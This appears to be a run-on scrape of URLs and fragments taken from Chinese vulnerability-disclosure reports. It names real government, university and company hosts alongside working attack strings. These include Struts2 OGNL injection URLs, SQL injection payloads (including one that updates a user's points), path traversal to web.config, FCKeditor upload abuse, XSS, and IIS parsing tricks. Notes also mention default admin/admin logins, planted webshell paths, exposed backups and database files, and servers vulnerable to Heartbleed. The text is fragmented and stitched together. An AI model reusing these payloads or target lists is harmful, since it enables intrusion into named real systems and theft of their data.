http://vedio.bjstats.gov.cn/vodlist.jspa?redirect:$%7B%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29%7D http://live.hwjyw.com/courseview.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://search.wenming.cn/godpp/godSearch.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.ccmag.cn/cusmMaganized!docMaganized.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://search.cdpf.org.cn/mb/j/search/search.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.zjport.gov.cn/ask/questionDetailt.jspa http://vchat.anhuinews.com:8080/chat/findPlay.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.sinopectv.cn/ http://search.news.cn/inSearch.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://mms.woshitv.com:8080/mmscis/videoPlay/CISGetVodPlayURL.jspa http://vchat.thmz.com:8080/WebRootPortal/findChatInfo.jspa http://sm.huanbohainews.com.cn:8080/mms3.2/videoPlay/findMaterialPlayUrlWithToken.jspa?materialId=4635&materialType=1&unitID=3931 http://z.ncnews.com.cn:8080/mmscms/liveRecordChannelMgr/getChannelPlayInfo.jspa?channelid=1 http://live.hebei.com.cn:8080/chat/playInfo.jspa?chatid=57 http://music.nbradio.com:8080/chat/listBackupChats.jspa?perPage=10 http://video.fjtv.net:8080/mms3.0/videoPlay/findBroadcastUrl.jspa http://www.txtv.net.cn:8080/ad/streamServer/saveStreamServer!input.jspa http://mms.am765.com/mediaUrl.jspa?indexid=459123&streamid=459121 http://mms.hnr.cn:8080/mms3.2/videoPlay/findMaterialPlayUrlWithToken.jspa?materialId=64807&materialType=1&unitID=29112 http://vblog.habctv.com/administrator/ http://v.scol.com.cn/administrator/index.php?mosmsg=Please+login http://chat.ahbbtv.com:8080/chat/findPlay.jspa http://video.sxrb.com/administrator/index.php http://live.tangshanradio.com/administrator/index.php http://mms.dztv.tv:8080/mms3.3/videoPlay/findBroadcastUrl.jspa?loadType=0&channelType=0&channelID=7 http://zhixing.court.gov.cn/search/search?pname=11%27 https://113.105.248.132 https://113.105.248.132/upload.php http://222.18.15.135:80/jiuye/broadcast_detail.php?id=744 http://211.152.123.83/login.jhtml http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://wenxue.scu.edu.cn/zangxue/magfull.aspx?id=171 http://ah.10155.com http://www.panshi.gov.cn/infopub25/expansion/bossmail/mail.mdb www.panshi.gov.cn/infopub25/20130905/123.asp http://218.242.176.202:8088/ http://218.242.176.202:8088/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp http://www.lbesec.com/report/error_report.action http://www.4008-197-197.com/order/header/get?headerId=85000000773020 www.jsagri.gov.cn/bsclxz/fll/files/new www.jsagri.gov.cn/bsclxz/fll/files/new/123.asp http://bbs.jcnews.com.cn/ ftp://jcnews.com.cn/%D6%B1%CB%B5.txt, http://www.kjks001.com/admin/login.php http://tdyw.tju.edu.cn/news_detail.php?sub=1&id=2812 site:ttkdex.com http://www.ttkdex.com/ttkdweb/admin_ttkd/welcome.jsp http://dept.ccbupt.com/rsc/ReadNews.asp?NewsID=223&BigClassID=7&SmallClassID=9 http://www.baidu.com/#wd=%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%95%99%E5%AD%A6%E8%BE%85%E5%8A%A9%E5%B9%B3%E5%8F%B03.0%20%E9%99%88%E6%96%8C&ie=utf-8&tn=baiduhome_pg&f=8&pn=10&rsv_page=1 http://dd.gzuni.com http://foundation.scu.edu.cn/uploadPic.asp http://zs.hzzk.gov.cn/zsyze/login/Jeecms.do http://software.twt.edu.cn/download.php?id=8465 cn:8080/ http://kuwo.cn:8080/jsp-examples/ http://www.sogou.com/咳咳。。。好像没啥。。插入XSS。。然后我一直点击上面的功能!谁知道。。 http://gouwu.sogou.com/shop?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28%2Fx%2F%29%3C%2Fscript%3E&display=grid&sourceid=sr_tbtn&w=01029901&sut=394&sst0=1396755107893 http://www.nmjt.gov.cn/whcx/index.jsp http://sqlmap.org http://www.cdbmj.gov.cn/bmpcms/ http://twt.tju.edu.cn/theory/type.php?t_id=2 http://twt.tju.edu.cn/theory/read.php?id=743 http://61.161.127.122/flcp/web/m/user/drawing http://www.edugd.cn/web/46/xw/1/46_11872/第二批数据问题_20080311.TXT http://gd.vnet.cn/然后点击这个 http://wooyun.org/bugs/wooyun-2014-053008,厂商已经做了修补。但是只是限制了列目录,没有做敏感信息访问的ip限制。 http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx http://tdyw.tju.edu.cn/Admin2/ http://sbc.nbut.edu.cn/admin/userlogin.aspx http://tdyw.tju.edu.cn/friends/rosemodel.php?son=articlelist&sub=1 http://tdyw.tju.edu.cn/counter/Graphp.php?Name=shouye http://g.tju.edu.cn:8800/services.php?action=safe_login&user_login_name= http://edit.hongxiu.com/zhuanti/review.asp?id=191%20order%20by%205-- http://202.119.84.62/web_admin/ http://gschool.hebmu.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://gschool.hebmu.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://121.14.4.151:88/icp/common/checklogin.action http://net.adpush.cn/ http://net.adpush.cn/Manage/EditADSpace/33000 http://www.scxzfw.gov.cn/ http://http://home.inc.hc360.com:8089,由tomcat搭建,访问http://home.inc.hc360.com:8089/manager/html.存在弱口令admin/admin,成功进入,部署一个webshell,然后走人。shell地址:http://home.inc.hc360.com:8089/job/ http://203.195.189.34/admin/ http://203.195.189.34/ http://203.195.189.34/admin/.svn/entries http://211.154.135.186/svn/happy/backend/web/admin http://211.154.135.186/svn/happy http://shenzhenair.com/module/wshdp.rar http://kms.homeinns.com/ https://www.dodopal.com/wap/news-content.php?id=1344 http://1ct.luolai.com:88/custom/supermarket/CreateInterestInfo.aspx http://click.es.baidu.com/adx.php?c=cz1lYWYxODcwOTIyZTFmYjYzAHQ9MTM5MjIxNTE4NABzZT0xAGJ1PTY3NzAzNjMAdHU9OTIyMzM3MjAzMjU2MDc0ODk5NQBhZD0yOTY2MwBzaXRlPWh0dHA6Ly93d3cuY2hhemlkaWFuLmNvbS9jeS8Adj0xAGk9MTJhMWE1ZWU&k=dz0yNTAAaD0yNTAAY3NpZD0xMDczNzQxODI0MjUwAHRtPTU2MTcwAHRkPTk0MDQ4MwBmbj1odW9jaGVjb21fY3ByAGZhbj0AdWlkPTY5NDIwMDUAY2g9AG9zPTEAYnI9MTIAaXA9MTQuMTM0LjE4Ni4xNDk&url=http%3A%2F%2Frtb%2Ebehe%2Ecom%2Fbdck%3Fexchgid%3D11%26extbd%3DMTk0NDg4LDE5MjA5LGFlYWUzOTkwOTEzM2U5ODY4YTMxMGUyZjkwYzFkM2FlLGJkXzgsMTQ4ODUzNDkwLDE0LjEzNC4xODYuMTQ5LDEzNzEwNjEwNDEwMDEwMCxDaHJvbWUsV2luZG93cyBYUCx6aCwsLGJkXzkyMjMzNzIwMzI1NjA3NDg5OTUsMixiOWtnblksaHR0cDovL3d3dy5jaGF6aWRpYW4uY29tL2N5Lyw5ODJhYzg1NjFiMTE3NWNi%26landing%3Dhttp%3A%2F%2Ft.mail.189.cn%2fA0VEZh%3fq%3d140107i0vviC5%26sid%3d148853490?%b2la7dlr http://zhushou.huihui.cn/api/event/jigsaw/getonepiece?jsonp=youdaogouwupi1396890582536&give=0&t=1396890582536 http://www.huihui.cn/minisite/zhushou_pintu?keyfrom=zhushou_pintu2&jigsaw=89effe61d5b6c522e5f3aa8014bb779c http://www.cssc-cul.org.cn/component_news/news_detail.php?id=0 http://pal.sgepri.sgcc.com.cn/web.rar http://www.foowu365.com/search/index.php?key=1&myord=1 http://su.whut.edu.cn/Myadmin/Login.aspx http://joe.game.tom.com http://www.php.net/cached.php?t=1234&f=index.php URL:http://www.jlcctele.com/NewsServlet?action=one&id=29 http://theme.oppo.com/?q=user/authordetail&author=%E5%B0%8F%E5%B8%83%E7%88%B1%E9%9B%A8%27%20and%201=1%23 http://theme.oppo.com/?q=user/authordetail&author=%E5%B0%8F%E5%B8%83%E7%88%B1%E9%9B%A8%27%20and%201=2%23 http://finance.whu.edu.cn/web3/content.aspx?lb=zc www.tools.net http://drops.wooyun.org/papers/1381 www.mogujie.com http://www.hicdma.com/views/contents/member/login/api/check_account.jsp?_=1396875610591&account=65854848465 http://www.17u.cn/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 http://www.now.cn/whois/nowcheck.net http://www.now.cn/chinesedomain/chnowcheck.net http://www.now.cn/indexr.php?r=!M2OT_231&page=/domain/index.net http://chinapost.com.cn/ http://yjcx.chinapost.com.cn/ http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLogin http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLoginVal http://bbs.anquan.org/forum.php?mod=viewthread&tid=40002 http://pan.baidu.com/s/1bnvOef1 http://t1.fanwe.net:94/m22/Goods-showcate-id-48.html http://ip.taobao.com/.svn/entries http://drops.wooyun.org/papers/1381 http://service.tp-link.com.cn/search_download.html?level1=0&level2=0&prodcut=0&kw=1 http://drops.wooyun.org/papers/1381 https://vip.btcchina.com www.snda.com https://account.mozilla.com.cn https://passport.vip.com http://www.126.com/ www.mycolorway.com http://www.59.cn/domain/search.asp https://login.kongfz.com http://www.cnhgs.com/main.php?id=1 URL:http://3g.96963.com/news_ct.php?id=250 http://mail.163.com/ https://passport.suning.com https://account.mozilla.com.cn http://heartbleed.com/ www.letv.com www.oschina.net https://account.sogou.com http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html http://drops.wooyun.org/papers/1381 http://s3.jspenguin.org/ssltest.py https://login.lvmama.com https://lastpass.com/ https://cmpay.10086.cn/存在运维不当导致可以登录随机用户并且获取服务器敏感信息 http://www.anquanbao.com/ https://uhost.ucloud.cn https://udb.ucloud.cn https://hao.yy.com www.126.com http://drops.wooyun.org/papers/1381 www.91.com http://www.oschina.net/news/50540/cve-2014-0160 http://www.bter.com www.ourgame.com http://www.easecoin.com/ http://redbaby.suning.com/ http://vip.suning.com/ http://binggo.suning.com/ www.leiphone.com https://www.yfcf.com/user-register http://newyunying.xinnet.com/ port:443 http://passport.sogou-inc.com/ www.yy.com存在OpenSSL www.changyou.com www.yodbank.com https://account.wandoujia.com inurl:edu www.kuaiyinpay.com可能获取到包含账号密码的HTTP请求 http://el.homeinns.com/login/index.html https://jinshuju.net www.coinsave.com可获取到部分用户信息及SQL语句 https://cloudcontrol.chinacache.com/ https://support.dnspod.cn http://www.newv.com.cn/fileroot/bos/content/news/case/bgkh/list.html inurl:nwc_755_newvexam inurl:nwc_user_cloud inurl:nwc_user_enterprise http://drops.wooyun.org/papers/1381 https://i ps://isis.nsfc.g ov.cn/egrantweb/ http://www.foowu365.com/base/install/ www.shuobar.cn http://www.gainward.cn/script/news_detail.php?id=281 http://mekluwc.bupt.edu.cn/modules.php http://mekluwc.bupt.edu.cn/modules.php http://mekluwc.bupt.edu.cn/admin.php http://www.4008117117.com/ http://xsda.bupt.edu.cn:81/yd_das_login.aspx https://id.ejoy.com/ http://hqxs.bupt.edu.cn/index.php http://hqxs.bupt.edu.cn/phpsso_server/uploadfile/avatar/1/1/42/22/conf1g.php http://meercin.bupt.edu.cn/dede/ www.kuaiyinpay.com www.kuaiyinpay.c www.kuaiyinpay.com..Connection www.kuaiyinpay.com..Connection www.kuaiyinpay.com..Connection http://hotel.11185.cn/ http://zj.sina.com.cn/crm/bookmgr/login.html http://yjxt.bupt.edu.cn/open/replyOpen.aspx?xsfl=11 http://yjxt.bupt.edu.cn/open/pyfaView.aspx?EID=Jw==&UID= https://sslvpn.tsinghua.edu.cn存在openssl www.jiepang.com www.jiepang.com http://qyh.zshr.cn/person/searchjobs.php?id=1 http://user.nipic.com/login.asp http://user.nipic.com/index.asp?open=event_prize_user.asp?leixing=1 http://user.nipic.com/index.asp?open=event_prize_user.asp?leixing=1;update%20az_user%20set%20gxfen=10%20where%20username='rainboyhi';-- https://www.newszeit.com/ www.qlqp2p.com http://www.china-sss.com/ http://www.china-sss.com/AirCust/ModifyNewPassword?sec=BE0D87EC3A1C77D6269E26C6C4DA07BFsplitStrEAC70A5C00049334D5C44CBB1204A0A1A143452127F795F5FB4E37C86907F5C1splitStr9B738C3935F8AB84DAF8DDB6BEAAB737 http://mall.china-sss.com/ http://mall.china-sss.com/member/findPwdModify?newPwd=805780&custId=9C0202325165 http://ce.atlenovo.com/ http://kfcstar.qq.com/ http://pfd.ceair.com/ http://pfd.ceair.com/finhome/index.html中 http://sut.edu.cn/ http://mail.jonhon.cn/ http://www.foowu365.com/news/html/?id=1%27%221000 http://180.138.196.131:8080/indexRedirect/AuditIndex.action http://www.ikuai8.com/ http://zh.ui.vmall.com//source/include/misc/misc_ranklist_index.php http://yqzb.wdjyzx.com/ http://www.gldjyq.cn:8133/yqgl/default.aspx http://219.159.68.143/default.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://data.simuwang.com/dt_company_info.php?id=CO0000004P jfx.nju.edu.cn/sbweb/ zcc.nenu.edu.cn/sbweb/ sbcx.bjmu.edu.cn/sbweb/ http://sbapd.wh.sdu.edu.cn/ cn:8001/ http://202.197.224.86:8085/sbweb/ sbgl.sdu.edu.cn/sbweb/ http://zcc.nenu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2 http://sbcx.bjmu.edu.cn/sbweb/Userlogin.asp?uid=1&pwd=2 http://211.65.116.58/sbweb/Userlogin.asp?uid=1&pwd=2 http://202.192.18.120/sbweb/index.asp http://124.172.245.220/ZTO/ http://124.172.245.220/ZTO/ZTO/GuangDong/Question.aspx http://www.gxhcte.gov.cn/plus/search/?key=111 www.fanli.com)通过sql注入可以随意登录,测试时登录的某些账户有V币和现金,站点高级别的用户可以提现和用V币充话费 www.pigai.org/?c=teacher&a=del&rid=XXXXXX http://big5.csair.com/SuniT/www.baidu.com/index.html http://big5.csair.com/SuniT/fish.cccsair.com/钓鱼.html http://olcs2.csair.com/upload.php http://www.canon.com.cn/support/service/etracking/checkValidateCode https://yidong.baidu.com/dana-na/auth/url_default/welcome.cgi https://webvpn.sina.com.cn/dana-na/auth/url_default/welcome.cgi https://vpn.renren-inc.com/dana-na/auth/url_default/welcome.cgi https://ksvpn.kingsoft.com/dana-na/auth/url_default/welcome.cgi http://www.zdnet.com.cn/ https://202.99.27.54/ http://www.cfachina.org中 www.cfachina.org http://www.cfachina.org http://g.chinaren.com http://box.pptv.com http://oa.syc.com.cn/OA/index/index.aspx http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx http://221.199.203.230:9001/dsoa/index/index.aspx http://180.166.56.106/dsoa/index/index0.aspx http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx http://oa.syc.com.cn/OA/help/HelpShow.aspx?id=1 http://oa.syc.com.cn/OA/ewebeditor/admin_login.asp,以默认admin:admin登陆,修改样式,记下样式名称,比如“s_exampleremote”,在“其它类型”中添加“aaspsp”, http://oa.syc.com.cn/OA/ewebeditor/upload.asp?action=save&type=FILE&style=s_exampleremote width:100% http://bbs.game.verycd.com http://bbs.db.changyou.com http://www.airchina.com http://210.41.218.62:8080/gmis/login.aspx http://210.41.218.62:8080/gmis/pygl/kbcx_jsprint.aspx?xq=19&xqmc=2013-2014春学期 http://www.wywk.cn/hwtUserAdmin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F http://modernsky.com/index.php?brand=1&cat=2&controller=site&t=news_records&w=0&action=news_pro_list&order=new http://www.modernsky.com/index.php?controller=site&action=news_pro_list&cat=1&order=new&t=news_artists&w=1 http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=22372『漏洞点』 http://buy.modernsky.com/index.php?controller=ucenter&action=order_detail&id=22378 http://news.yangtzeu.edu.cn)存在SQL注射 http://sss.bnu.edu.cn/iesadmin/login.php http://buy.modernsky.com/index.php?controller=simple&action=cart3 site:com.cn filetype:xls http://ryzp.kmust.edu.cn/rscsh/recrubaoming_new.aspx?id=00013503 site:com.cn filetype:xls http://www.mxwz.com/news/20140310/viwe_395.html http://www.mxwz.com/ http://gs.tju.edu.cn/zyb/news_detail.asp?id=731 www.emeraldinsight.com.cn www.emeraldinsight.com.cn http://www.emeraldinsight.com.cn http://bbs.kafan.cn/config/config_global.php.bak https://email.cnnp.com.cn/ http://www.nrdc.cn/our_program_flag.php?cid=256 http://cvnuser.test.kingdee.com/ http://cvnuser.test.kingdee.com/webapp/WEB-INF/classes/conf/spring/applicationContext-datasource.xml http://cvnuser.test.kingdee.com/webapp/ http://cvnuser.test.kingdee.com/phpMyadmin http://www.himedia-tech.cn www.himedia-tech.cn http://www.himedia-tech.cn http://www.jifenzhong.com/ http://www.jifenzhong.com/user/2144479/cover http://buy.modernsky.com//index.php?action=news_pro_list&cat=2&controller=site&order=new&t=news_records&w=0 http://buy.modernsky.com/upload/mmc.php http://buy.modernsky.com/upload/tmpuohap.php https://vpn.cumt.edu.cn https://vpn.bjfu.edu.cn https://vpn.xjtu.edu.cn http://my.damai.cn/account/myinfo http://per.damai.cn https://219.238.238.38/sort/list.aspx https://www.jw-assoc.com/products.html&c_id=82&d_id=104 http://minisite.youku.com/test/thumb/upload/ http://www.ncxf.gov.cn/search.php?do=search&s=ww&select=%E5%85%A8%E6%96%87%E6%A3%80%E7%B4%A2&imageField.x=24&imageField.y=10 http://sss.bnu.edu.cn/mainview.php?cid=1&id=16 http://www.skyexam.com/caar/FAQDetail.aspx?QAID=2 http://www.weifang.gov.cn:7001/wasadmin/ http://ins.xieshouwang.com.cn/Company/DownLoad?filename=1.txt&savename=..\..\web.config http://tc.homelink.com.cn/ http://www.scmb.gov.cn/1.asp http://www.scmb.gov.cn/6.asp http://www.scmb.gov.cn/9.asp http://www.scmb.gov.cn/2.asp http://www.scmb.gov.cn/admin_login.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/Admin_Admin.asp http://www.scmb.gov.cn/Admin_Maillist.asp http://www.scmb.gov.cn/Admin_Message.asp http://www.scmb.gov.cn/Admin_UploadFile.asp http://www.scmb.gov.cn/admin_user.asp http://www.scmb.gov.cn/Admin_Login.asp http://www.scmb.gov.cn/conn.asp http://www.scmb.gov.cn/default.asp http://www.scmb.gov.cn/editor.asp http://www.scmb.gov.cn/function.asp http://www.scmb.gov.cn/inc/config.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/Upload_Dialog.asp http://www.scmb.gov.cn/upload_article.asp http://www.scmb.gov.cn/upfile_photo.asp http://www.scmb.gov.cn/upload_softpic.asp http://www.scmb.gov.cn/Upfile_SoftPic.asp http://www.scmb.gov.cn/Upfile_Article.asp http://www.scmb.gov.cn/Upload_SoftPic.asp http://www.scmb.gov.cn/Upload_AdPic.asp http://www.scmb.gov.cn/Upfile_Dialog.asp http://www.scmb.gov.cn/Upfile_OrderPic.asp http://www.scmb.gov.cn/Upfile_AdPic.asp http://www.scmb.gov.cn/user_login.asp http://www.scmb.gov.cn/User_GetPassword.asp http://www.scmb.gov.cn/upfile_soft.asp http://www.scmb.gov.cn/Upfile_Soft.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/top.asp http://www.scmb.gov.cn/userlist.asp http://www.scmb.gov.cn/Index.asp http://www.scmb.gov.cn/index.asp http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/maillist.mdb http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/index.htm http://www.scmb.gov.cn/UploadSoft/ http://www.scmb.gov.cn/New/ http://www.scmb.gov.cn/Images/ http://www.scmb.gov.cn/Inc/ http://www.scmb.gov.cn/DataBackup/ http://www.scmb.gov.cn/img/ http://www.scmb.gov.cn/Admin_Admin.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/aspnet_client/system_web/ http://www.scmb.gov.cn/aspnet_client/system_web/2_0_50727/ http://www.scmb.gov.cn/aspnet_client/ http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/DataBackup/ http://www.scmb.gov.cn/images/ http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/index.htm http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/default.asp http://www.scmb.gov.cn/index.html http://www.scmb.gov.cn/admin_admin.asp http://www.scmb.gov.cn/Admin_Database.asp http://www.scmb.gov.cn/Admin_Maillist.asp http://www.scmb.gov.cn/maillist.mdb http://www.scmb.gov.cn/Admin_Message.asp http://www.scmb.gov.cn/admin_login.asp http://www.scmb.gov.cn/admin_uploadfile.asp http://www.scmb.gov.cn/UserList.asp http://www.scmb.gov.cn/conn.asp http://www.scmb.gov.cn/default.htm http://www.scmb.gov.cn/function.asp http://www.scmb.gov.cn/admin_user.asp http://www.scmb.gov.cn/Upfile_SoftPic.asp http://www.scmb.gov.cn/upfile_soft.asp http://www.scmb.gov.cn/test.asp http://www.scmb.gov.cn/user_login.asp http://www.scmb.gov.cn/vote.asp http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/top.asp http://www.scmb.gov.cn/User_GetPassword.asp http://www.scmb.gov.cn/end.asp http://www.scmb.gov.cn/upfile_Dialog.asp http://www.scmb.gov.cn/1.asp http://www.scmb.gov.cn/test.txt http://www.scmb.gov.cn/upfile_photo.asp http://www.scmb.gov.cn/upfile_article.asp http://www.scmb.gov.cn/index.asp http://www.scms.gov.cn/Pic.aspx http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scztb.gov.cn/index.html http://www.scztb.gov.cn/robots.txt http://www.scmb.gov.cn/wwwroot.rar http://www.scmb.gov.cn/1.asp http://uestat.video.qiyi.com/ http://118.85.207.84/。弱口令猜解半天无果。突然,我发现了新大陆: http://www.gtcws.com/system/system.asp http://www.gtcws.com/expert/expertquery.asp content://com.antiy.avlpro.MyProvider,却无权限暴露在外 http://localhost/index.php?c=ajax&a=member_login&template=/../../config.php http://sqb.scu.edu.cn/check.asp http://sesuen.scu.edu.cn/admin/login.aspx http://kqjzw.scu.edu.cn/admin/admin_login.asp http://gobuild.io/download/github.com/titanous/heartbleeder http://tjxt.kmust.edu.cn/ http://tjxt.kmust.edu.cn/manage/ http://tjxt.kmust.edu.cn/manage/UserManagement.aspx http://tjxt.kmust.edu.cn/manage/login.aspx http://tjxt.kmust.edu.cn/manage/AdminLeft.aspx https://webmail.eascs.com存在openssl漏洞 http://oa.eascs.com/eaoa/loginAction.do http://www.xnepb.gov.cn/ site:gov.cn filetype:xls http://mail.ha.chinamobile.com/sms/ http://www.math.pku.edu.cn/is/oldversion/show.php?id=200 http://saa.scu.edu.cn:80/xueyuangk/NewsArticle.aspx?newsid=57 http://club.ellechina.com/ http://cps.miqi.cn/login http://sunshine.tedc.cn:8080/sunshine-1.0/login http://www.infojiading.cn/ http://www.lidapoly.edu.cn/job/asearch.asp http://job.smic.edu.cn/EntRegister1.asp http://jiuye.sbs.edu.cn/EnterpriseReg.asp http://www.lidapoly.edu.cn/job/asearch.asp为例: http://www.lidapoly.edu.cn/job/asearch.asp https://61.144.224.101 http://xbkfy.scu.edu.cn/rkyj.zip http://xbkfy.scu.edu.cn/db.zip http://xbkfy.scu.edu.cn/website.zip http://www.pt80.net/ http://point.gzgwbn.net.cn/newsinfo.aspx?nid=72 https://mail.kejxer.eu/iredadmin/ https://brtaxi.hu/iredadmin/ https://to-text.ru/iredadmin/ https://www.rnmsrv.de/iredadmin http://cwrh.scu.edu.cn/install/ http://www.magicwinmail.com/success.php列出了用户,赫然看到 https://61.144.225.113/ http://st.scu.edu.cn:80/kyjd/DocumentView.aspx?ArticleShowID=6 http://st.scu.edu.cn/admin/admin_link.aspx http://marketing.352.com/ http://www.11185buy.com/web.rar http://www.yanjing.com.cn/admin/login.asp site:XXXX.com.cn http://www.gonbes.com/newsdetail.php?id=464 http://flashdata.2006.sina.com.cn/index.php?area_id=1 http://flashdata.2006.sina.com.cn/index.php?level1_id=7&level2_id=118 http://flashdata.2006.sina.com.cn/index.php?area_id=1%20and%20UpdateXML%281,CONCAT%280x5b,mid%28%28SELECT%20version%28%29%29,1,32%29,0x5d%29,1%29%23 http://lib.uoh.edu.cn/xingdongfan/db.asp http://rz.qq.com/json.php?mod=auth&act=nickname&callback=checkLoginCB&t=1397270961106 http://zsb.ybu.edu.cn/index.php?id=134的搜索框中构造sql语句,可以查询出招生信息,搜索框限制了字符长度,但是没有对特殊字符进行过滤,而且仅仅只是在浏览器端限制了字符长度,可以通过抓包的方式绕过长度限制 http://wooyun.org/bugs/wooyun-2010-049385 http://performance.wanda.cn http://www.wandaperformance.com/FileUpload http://www.google.de/#newwindow=1&q=inurl:enterprise-info!getCompanyInfo.action chrome://newtab/ http://jp.zzuli.edu.cn/shigong/BoardView.asp?id=11 www.wooyun.org http://jszyzx.njau.edu.cn/XCAdmin/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/aspx/connector.aspx http://heart.njau.edu.cn/db/class.php?class=1 http://weixin.zgsj.com/ http://oa.352.com:88/db/ http://www.hymaco.com:8080/hyoa2/file/fileList.do?method=FileList&Vis1=1&Vis2=1&Vis3=0&Vis4=0&filePath=D://HYOA//hyoa2//WebRoot//WEB-INF http://zfxxgk.beijing.gov.cn/columns/91/5/fgdyna.prDownload.prDownLoadDynaInfoAttch.do?ATCH_ID=81434+and+1=1 http://210.75.211.5/columns/91/5/fgdyna.prDownload.prDownLoadDynaInfoAttch.do?ATCH_ID=81250 paimai.wwtx.cn/auction.php?area=555&category_chi=0&category_fa=1&city=San%20Francisco&keyword=1&province=NY http://www.352.com/news/61546.jhtml http://oa.352.com:517/ http://oa.352.com:88/phpinfo.php http://oa.352.com:88/test.php http://mzone.nurunchina.com/.svn/entries http://i.ziroom.com/后 http://i.ziroom.com/index.php?uri=contract/receipt&contract_code=BJCW81308250155&pay_plan=1 http://vojradio.vojs.cn/ http://vojradio.vojs.cn/admin/menu.asp http://vojradio.vojs.cn/vod/ http://vojradio.vojs.cn/vod/1.asp;.jpg这个。丢到菜刀没想到真的可以进去了 http://vojradio.vojs.cn/ys.html www.discoveryland.cn http://fj.189.cn/biz/service/transaction/general_tp_register.jsp http://fj.189.cn/biz/service/transaction/uploadfile/file/1397444009862.jsp http://m.chkee.com/wap2/user_space.php?sid=&uid=1 http://ihwr.hydr.tsinghua.edu.cn话说这个网站,是使用了dedecms的程序。然后把找到它账号密码的EXP相信大家都懂的! http://chengjiao.fosu.edu.cn/zk/denglu.asp http://peixun.bgpintl.com/web/New.aspx?typeid=14 http://www.president-starbucks.com.cn/index.html http://bsm.wandafilm.com/manager/html https://vpn.telecomjs.com/prx/000/http/localhost/login‎ http://fp.huafans.cn/?f=events&on=show&id=7090 http://fp.huafans.cn/admin/upload.php http://www.0798.org/tools/pianfang/ http://zjukjc.zju.edu.cn/command/login.jsp http://zjukjc.zju.edu.cn/command/auth/loginname-getback.jsp http://jxw.giant.com.cn可上传脚本文件,从而得到WEBSHELL,服务器未对各分站进行权限划分导致可以跨到主站及其他分站程序 http://202.4.130.200:81/ http://www.cpac.com.cn/ http://www.cpac.com.cn/manage/ http://xjd.tcl.com:8008/ user.nipic.com/index.asp http://user.nipic.com/shoucang_kind.asp?check=add http://www.kaixinzuowen.com/uc_server http://hjhg.tjpu.edu.cn/down/class/index.php?page=1&catid=9&myord=dtime&myshownums=&showtj=&author=&key= 